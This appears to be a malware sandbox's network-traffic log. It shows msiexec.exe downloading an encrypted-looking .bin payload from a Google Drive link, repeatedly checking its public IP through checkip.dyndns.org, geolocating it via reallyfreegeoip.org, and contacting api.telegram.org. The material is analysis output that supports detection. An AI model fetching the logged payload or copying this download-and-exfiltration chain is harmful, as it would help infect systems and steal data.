Mar 7, 2025 16:21:22.809921980 CET  49707  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:22.813340902 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:22.813395023 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:22.813460112 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:22.813910007 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:22.813927889 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:25.441836119 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:25.441973925 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:25.443810940 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:25.443829060 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:25.444122076 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:25.445548058 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:25.492336035 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:26.055880070 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:26.055937052 CET  443    49709  149.154.167.220  192.168.2.8
Mar 7, 2025 16:21:26.056046963 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:26.058531046 CET  49709  443    192.168.2.8      149.154.167.220
Mar 7, 2025 16:21:32.643204927 CET  49699  80     192.168.2.8      132.226.247.73
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Mar 7, 2025 16:20:41.273633957 CET  49752        53         192.168.2.8  1.1.1.1
Mar 7, 2025 16:20:41.280874968 CET  53           49752      1.1.1.1      192.168.2.8
Mar 7, 2025 16:20:44.442312956 CET  51621        53         192.168.2.8  1.1.1.1
Mar 7, 2025 16:20:44.449320078 CET  53           51621      1.1.1.1      192.168.2.8
Mar 7, 2025 16:20:51.120187044 CET  55075        53         192.168.2.8  1.1.1.1
Mar 7, 2025 16:20:51.128155947 CET  53           55075      1.1.1.1      192.168.2.8
Mar 7, 2025 16:20:52.361541033 CET  61758        53         192.168.2.8  1.1.1.1
Mar 7, 2025 16:20:52.371618032 CET  53           61758      1.1.1.1      192.168.2.8
Mar 7, 2025 16:21:22.805269003 CET  53572        53         192.168.2.8  1.1.1.1
Mar 7, 2025 16:21:22.812621117 CET  53           53572      1.1.1.1      192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 7, 2025 16:20:41.273633957 CET | 192.168.2.8 | 1.1.1.1 | 0x760c | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:44.442312956 CET | 192.168.2.8 | 1.1.1.1 | 0x4631 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:51.120187044 CET | 192.168.2.8 | 1.1.1.1 | 0xd9e7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.361541033 CET | 192.168.2.8 | 1.1.1.1 | 0xba51 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:21:22.805269003 CET | 192.168.2.8 | 1.1.1.1 | 0x7178 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 7, 2025 16:20:41.280874968 CET | 1.1.1.1 | 192.168.2.8 | 0x760c | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:44.449320078 CET | 1.1.1.1 | 192.168.2.8 | 0x4631 | No error (0) | drive.usercontent.google.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:51.128155947 CET | 1.1.1.1 | 192.168.2.8 | 0xd9e7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 7, 2025 16:20:51.128155947 CET | 1.1.1.1 | 192.168.2.8 | 0xd9e7 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:51.128155947 CET | 1.1.1.1 | 192.168.2.8 | 0xd9e7 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:51.128155947 CET | 1.1.1.1 | 192.168.2.8 | 0xd9e7 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:51.128155947 CET | 1.1.1.1 | 192.168.2.8 | 0xd9e7 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:51.128155947 CET | 1.1.1.1 | 192.168.2.8 | 0xd9e7 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:20:52.371618032 CET | 1.1.1.1 | 192.168.2.8 | 0xba51 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 16:21:22.812621117 CET | 1.1.1.1 | 192.168.2.8 | 0x7178 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49692 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:20:51.137639999 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 7, 2025 16:20:51.842865944 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:20:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 16:20:51.846158028 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Mar 7, 2025 16:20:52.055900097 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:20:51 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 7, 2025 16:20:55.240087986 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Mar 7, 2025 16:20:55.451503038 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:20:55 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49695 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:20:58.226629972 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Mar 7, 2025 16:20:58.930313110 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:20:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49697 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:21:01.542932987 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Mar 7, 2025 16:21:02.253025055 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:02 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49699 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:21:05.052367926 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Mar 7, 2025 16:21:05.761809111 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:05 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49701 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:21:08.543127060 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 7, 2025 16:21:09.273799896 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:09 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49703 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:21:12.036703110 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 7, 2025 16:21:12.755656958 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:12 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49705 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:21:15.645728111 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 7, 2025 16:21:16.371177912 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49707 | 132.226.247.73 | 80 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Mar 7, 2025 16:21:18.996409893 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Mar 7, 2025 16:21:19.715512991 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:21:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49690 | 142.250.184.238 | 443 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 15:20:43 UTC | 216 | OUT | GET /uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: drive.google.com
Cache-Control: no-cache
2025-03-07 15:20:44 UTC | 1610 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 07 Mar 2025 15:20:44 GMT
Location: https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-UEBnUmeEKuFc_eqnZ4AnZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49691 | 172.217.16.193 | 443 | 3488 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 15:20:46 UTC | 258 | OUT | GET /download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-03-07 15:20:49 UTC | 5029 | IN | HTTP/1.1 200 OK
X-GUploader-UploadID: AKDAyIsWdlIJYqiY0hYmCQ6g60k9qn4IrXJaTNY9oG_UHeJpSDm_RTLGGgo7GvJQx42JW_ENT1XMYhU
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="GyHBvaByReCcAlfPocsb66.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 276032
Last-Modified: Tue, 25 Feb 2025 07:29:52 GMT
Date: Fri, 07 Mar 2025 15:20:49 GMT
Expires: Fri, 07 Mar 2025 15:20:49 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=24gx0Q==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                                                                                                                          2025-03-07 15:20:49 UTC5029INData Raw: e7 2c 13 6b c5 ca e7 ff ae 32 86 62 98 db 4a 4d 2a 30 72 5d f6 8d 4c 67 c7 62 62 08 d9 f3 b0 f6 60 7b 71 05 f5 13 93 0f c8 55 8f 85 30 5e 08 a0 af 0a f9 60 05 65 c7 76 7a 08 fd 38 3a 03 80 c8 0a f5 cc c3 58 19 d6 8e d5 e7 0e f6 05 b1 06 8f 79 bd db 36 be 87 d8 98 54 dd de 0d 1d 8d b7 d1 7c 89 f2 c8 ad e9 63 b8 f3 f6 fc 4e 64 05 35 21 0f 6e fb 7e 1a 88 1d 2a 0a 4f 81 c8 82 82 05 b1 96 be 3e 1b 6c 21 49 d6 1d 5c f4 de 88 7d f4 6c c4 45 13 00 e0 a2 82 90 1d 15 cd 67 9c 87 34 19 ec 95 3e be 4b 9e 81 49 d8 ea ef 90 7d 61 23 13 02 d1 8f c7 78 e5 2a a3 dd ab 41 27 5c 2a 57 a7 69 36 4f 63 a7 07 c1 1f ac 34 e3 27 76 62 8a 6d 1c 44 94 e4 e6 81 e8 8f 5b a3 65 78 87 77 37 6f 22 00 6c a9 c1 a4 6f 33 63 3a 7d 88 6a e0 61 9a 29 ec 42 59 37 9a 01 fb 4b 10 da dd 97 39 81
                                                                                                                                                                          Data Ascii: ,k2bJM*0r]Lgbb`{qU0^`evz8:Xy6T|cNd5!n~*O>l!I\}lEg4>KI}a#x*A'\*Wi6Oc4'vbmD[exw7o"lo3c:}ja)BY7K9
                                                                                                                                                                          2025-03-07 15:20:49 UTC4642INData Raw: 4f 77 4b 60 0b 70 e2 b5 2a c2 34 24 4c ff b9 05 3d 17 c6 45 99 e9 6a 31 bf 57 d1 67 05 f4 1a 91 00 d5 fb 9f 34 6d 24 bc 0c 45 52 73 39 77 1f 11 6b 33 3b c2 84 d7 7a 60 ff 2c d4 b8 03 a4 2f 44 e8 b5 6b de 78 ce ca 20 13 ad 62 9f 6a b4 f3 67 24 b7 ec b4 e5 48 74 2c 6a ef 89 45 8f 28 a7 54 59 7d 9d a5 24 b2 25 6d 7c 00 0c 45 46 97 be 40 30 49 99 eb 66 48 74 30 74 a2 f7 70 d3 54 e6 7c fd 23 87 e7 06 24 21 c3 5d de 92 0d 47 04 e8 27 73 d5 9f 14 58 54 9a 56 96 f1 38 c2 48 41 cc 6c 14 50 53 97 17 9a 64 ba 1c d3 76 38 3b 85 dc e6 cc 78 d0 9e 5d df 05 da 7a 25 d8 37 b9 7f 6c 5f 6d 2b fb a0 10 5b 69 7c 11 3a 9b ec 5c 50 c1 78 bf f8 bb bf fc 38 23 6f 92 e7 cc 79 92 90 ea 78 3d 15 9f 8f a8 87 50 d1 a4 e0 42 83 7f 2f 03 7f 16 b1 7a e7 2d 94 0e 72 69 53 81 96 08 33 f3
                                                                                                                                                                          Data Ascii: OwK`p*4$L=Ej1Wg4m$ERs9wk3;z`,/Dkx bjg$Ht,jE(TY}$%m|EF@0IfHt0tpT|#$!]G'sXTV8HAlPSdv8;x]z%7l_m+[i|:\Px8#oyx=PB/z-riS3
                                                                                                                                                                          2025-03-07 15:20:49 UTC1322INData Raw: 2c 97 bb cc 55 38 a7 8c 43 fb 51 52 5e 3c 07 06 85 92 4e 36 59 b9 d7 9e 60 c9 a9 d8 0b f7 2e 1a 3f 8a 20 19 60 0c df 60 96 43 66 58 e7 8a 9e ec fc 81 1a 23 b7 b3 f8 bf 0f f9 bc 4b 1a eb 45 72 23 59 9b ea 3c b2 e6 55 a6 7b 7e 74 a8 a6 0d c6 13 f0 a9 79 2c 59 af e8 97 b8 cd 64 6a 0d 89 fc e6 93 ad 4e 23 d5 8e 4e fa 26 60 92 60 eb 21 33 33 27 59 19 63 7b a6 d4 f9 63 54 53 5f 97 0c 16 8a f1 99 30 96 6f e5 36 c6 e5 34 72 42 f3 a8 65 3f 3d e1 4a e3 9f 36 40 66 80 ce 60 3d 9c 3a 6b 00 5c d9 76 9c 08 f1 c4 e4 f8 97 7f 40 dc 59 03 4b 6e b7 e4 67 2f d5 a9 fc 8f 53 a4 e5 1a 99 09 0d 66 6b 04 27 6e 87 d7 41 8a b0 d6 b5 9c 2a 38 8b 2a 6f 89 d9 1a 21 d4 67 3a 2a 57 27 ac d4 00 52 bc 44 7f ba 0f 97 80 4e 8c 5a f9 c4 34 73 f9 e0 71 fe 72 7d 69 b0 42 39 9a d6 46 29 4d 94
                                                                                                                                                                          Data Ascii: ,U8CQR^<N6Y`.? ``CfX#KEr#Y<U{~ty,YdjN#N&``!33'Yc{cTS_0o64rBe?=J6@f`=:k\v@YKng/Sfk'nA*8*o!g:*W'RDNZ4sqr}iB9F)M


Session ID: 2
Source IP: 192.168.2.8 | Source Port: 49693 | Destination IP: 104.21.80.1 | Destination Port: 443 | PID: 3488 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-07 15:20:54 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-03-07 15:20:55 UTC | 860 | IN | HTTP/1.1 200 OK
Date: Fri, 07 Mar 2025 15:20:54 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 3411
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 07 Mar 2025 14:24:03 GMT
